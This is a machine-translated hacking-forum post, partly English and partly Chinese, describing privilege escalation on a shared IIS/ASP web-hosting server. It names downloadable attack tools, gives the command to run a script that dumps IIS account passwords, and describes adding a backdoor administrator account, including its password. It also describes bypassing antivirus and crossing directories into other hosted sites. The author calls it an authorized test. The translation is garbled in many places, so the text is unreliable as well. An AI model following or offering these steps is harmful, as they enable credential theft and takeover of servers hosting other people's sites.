Domestic IDC operators are most common pattern is resolved with IIS asp, outer stars, the new network, Western Digital, Huazhong so on. . .
These virtual hosts are very difficult to put right. Recently niche and learning in core subjects in the first group of penetration penetration test, it would face once, to talk about here.
I) prelude
side note, the same service, virtual host server, only supports parsing asp, aspx and php do not support
the most Fortunately, the web hosting actually forgot to disable wscript
but the server upload rogue software and antivirus software Norton 360, though I do not understand why the rogue software and antivirus software will co-exist, but I am more clear that more difficult to put right.
II) mention the right
since it is a side note, and that is to find ways to cross-directory, which directory to cross it?
IIS, it is actually very easy, ASPX usually comes with Malaysia, but asp, then you need to perform the command. See Section Xi arsenal:
http://attach.blackbap.org/down/wzaq/iis.vbs
This script is a script read iis Web account password, upload cmd.exe, cscript.exe and this iis.vbs to write executable directory (usually c: \ windows \ temp)
and then
cscript iis.vbs
Get account and password as well as the path of the iis
some web hosting, a server on top of thousands of asp station, easy timeout
then to change that:
cscript iis.vbs > iis.txt
This prevents web overtime
提权的时候确实是费了很大一番劲,各种溢出用遍了,没法成功,各种神器用遍了,搞不到serv-u这些软件
不过最后还是成功了,这样我们就成功添加了一个administrators的账户cond0r,密码是123!@#asdASD
iis溢出得到system,shell.user组件添加用户绕过360
III)跨目录
如果事情都是这么顺利,那么这个帖子也就没啥意义了
问题有这样几个,第一,远程桌面服务开启,读取注册表默认为3389,但是用webshell扫描本机端口3389是关闭的,nmap扫了下,没检测到远程桌面的端口
第二,netstat命令被禁,自己传一个netstat.exe也没回显,同样的net.exe也是一样的
这样即使提权成功了,也没法登陆服务器,好吧,我们不是有IIS的密码吗?
同样是习科兵器库里面,在网站安全分类下
http://attach.blackbap.org/down/wzaq/bs.rar
With this artifact, uploaded to the web hosting iis later, Run, the first default interface point "ok"
and then verify box will pop up as follows:
Here you can enter a user name and password for the target IIS account (IUSER_00744% MjI1NDkyMDA5MTAyNjE), but usually it approach is less effective
here is not without exception failed, then I direct administrators account well, cond0r account and password you just created
this way we get permission administrators to browse the catalog
of course, this rights are also very easy to put goals scored station
I wrote the post, which is usually not say how the method how to win what station, learning the team of formal authorization penetration which can separate out as a typical case is concerned, but which is also a case can not be copied to other places, so I'm talking about are ideas, have their own ideas have a soul, out of its own way is the real black wide.
link:http://bbs.blackbap.org/thread-3868-1-1.html
Comments: The highlight of this article is to re-assign permissions across directories, usually a lot of people would like to mention the right to get after the shell, when encountered various ring true, can read this article, it gives a good idea?